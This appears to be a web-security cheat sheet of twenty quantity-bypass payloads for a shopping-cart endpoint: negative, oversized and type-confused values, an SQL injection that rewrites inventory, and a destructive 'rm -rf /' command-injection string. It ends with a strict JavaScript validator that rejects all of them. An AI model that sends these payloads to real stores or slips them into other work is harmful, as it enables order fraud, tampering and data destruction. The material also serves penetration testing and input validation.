Quantity Bypass Examples
Use these techniques to exploit quantity bypass vulnerabilities:
1. Basic Quantity Bypass:
// Original request
POST /add_to_cart
{
"item_id": "ITEM001",
"quantity": 1
}
// Bypassed request
POST /add_to_cart
{
"item_id": "ITEM001",
"quantity": 1000 // Exceed stock limit
}
2. Negative Quantity Attack:
// Use negative quantities
{
"item_id": "ITEM001",
"quantity": -10
}
// If the server subtracts the quantity from stock without validation, this increases inventory
3. Large Quantity Attack:
// Use very large quantities
{
"item_id": "ITEM001",
"quantity": 999999
}
// Probe stock limits and integer overflow with very large values
4. Decimal Quantity Attack:
// Use decimal quantities
{
"item_id": "ITEM001",
"quantity": 0.5
}
// Fractional quantities
5. String Quantity Attack:
// Use string quantities
{
"item_id": "ITEM001",
"quantity": "1000"
}
// String instead of number
6. Array Quantity Attack:
// Use array quantities
{
"item_id": "ITEM001",
"quantity": [1000]
}
// Array instead of number
7. Object Quantity Attack:
// Use object quantities
{
"item_id": "ITEM001",
"quantity": {"value": 1000}
}
// Object instead of number
8. Boolean Quantity Attack:
// Use boolean quantities
{
"item_id": "ITEM001",
"quantity": true
}
// Boolean instead of number
9. Null Quantity Attack:
// Use null quantities
{
"item_id": "ITEM001",
"quantity": null
}
// Null instead of number
10. Undefined Quantity Attack:
// Use undefined quantities
{
"item_id": "ITEM001",
"quantity": undefined
}
// Undefined instead of number (not valid JSON; only a lenient parser or eval-style parsing accepts it)
11. Infinity Quantity Attack:
// Use infinity quantities
{
"item_id": "ITEM001",
"quantity": Infinity
}
// Infinity instead of number (not valid JSON; rejected by a strict parser)
12. NaN Quantity Attack:
// Use NaN quantities
{
"item_id": "ITEM001",
"quantity": NaN
}
// NaN instead of number (not valid JSON; rejected by a strict parser)
13. Scientific Notation Attack:
// Use scientific notation
{
"item_id": "ITEM001",
"quantity": 1e6
}
// Scientific notation for large numbers (valid JSON: parses to 1000000)
14. Hexadecimal Quantity Attack:
// Use hexadecimal quantities
{
"item_id": "ITEM001",
"quantity": 0x3E8
}
// Hexadecimal representation (not valid JSON; only a lenient parser accepts it)
15. Octal Quantity Attack:
// Use octal quantities
{
"item_id": "ITEM001",
"quantity": 01000
}
// Octal representation (leading zeros are not valid JSON; only a lenient parser accepts it)
16. Binary Quantity Attack:
// Use binary quantities
{
"item_id": "ITEM001",
"quantity": 0b1111101000
}
// Binary representation (not valid JSON; only a lenient parser accepts it)
17. Unicode Quantity Attack:
// Use unicode quantities
{
"item_id": "ITEM001",
"quantity": "१०००"
}
// Unicode digits: some integer parsers accept these (Python's int() does), others reject them (JavaScript's Number() does not)
18. SQL Injection via Quantity:
// SQL injection in quantity
{
"item_id": "ITEM001",
"quantity": "1; UPDATE inventory SET stock = 999999 WHERE id = 'ITEM001'; --"
}
// SQL injection to modify inventory
19. XSS via Quantity:
// XSS in quantity
{
"item_id": "ITEM001",
"quantity": ""
}
// XSS payload in quantity
20. Command Injection via Quantity:
// Command injection in quantity
{
"item_id": "ITEM001",
"quantity": "1; rm -rf /"
}
// Command injection payload
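Defensive counterpart, added here as an example and not code from the original page: a strict server-side validator for the /add_to_cart body that rejects every payload above. The names addToCart, validateQuantity, MAX_PER_LINE and the STOCK table are assumptions constructed for the example.

```javascript
// Strict add-to-cart validation (added example). Assumed limits and a constructed stock table.
const MAX_PER_LINE = 100;          // assumed per-line cap for a single cart entry
const STOCK = { ITEM001: 25 };     // constructed sample inventory

// Parse the raw body with strict JSON only. undefined, Infinity, NaN, 0x3E8, 0b..., leading-zero
// octal and trailing // comments are all rejected by JSON.parse, so they never reach
// application code unless a lenient parser or eval-style parsing is used instead.
function parseBody(rawBody) {
  try {
    return { ok: true, body: JSON.parse(rawBody) };
  } catch (e) {
    return { ok: false, reason: "invalid_json" };
  }
}

// Accept only a JSON number that is a safe integer in [1, MAX_PER_LINE] and within stock.
// No coercion: "1000", [1000], {"value":1000}, true, null and strings carrying SQL or
// shell metacharacters are all rejected by the type check before any other logic runs.
function validateQuantity(q, stock) {
  if (typeof q !== "number" || !Number.isSafeInteger(q)) return "not_an_integer"; // 0.5, NaN-like
  if (q < 1) return "below_minimum";                  // negative and zero quantities
  if (q > MAX_PER_LINE) return "above_per_line_limit"; // 999999, 1e6, 1000
  if (q > stock) return "exceeds_stock";               // more than is actually available
  return null;
}

// Returns { accepted: true, item_id, quantity } or { accepted: false, reason }.
function addToCart(rawBody) {
  const parsed = parseBody(rawBody);
  if (!parsed.ok) return { accepted: false, reason: parsed.reason };
  const { item_id, quantity } = parsed.body;
  // Item ids are looked up, never interpolated; an allow-list pattern keeps the key simple.
  if (typeof item_id !== "string" || !/^[A-Z0-9]{1,16}$/.test(item_id)) {
    return { accepted: false, reason: "bad_item_id" };
  }
  if (!Object.hasOwn(STOCK, item_id)) return { accepted: false, reason: "unknown_item" };
  const err = validateQuantity(quantity, STOCK[item_id]);
  if (err) return { accepted: false, reason: err };
  return { accepted: true, item_id, quantity };
}
```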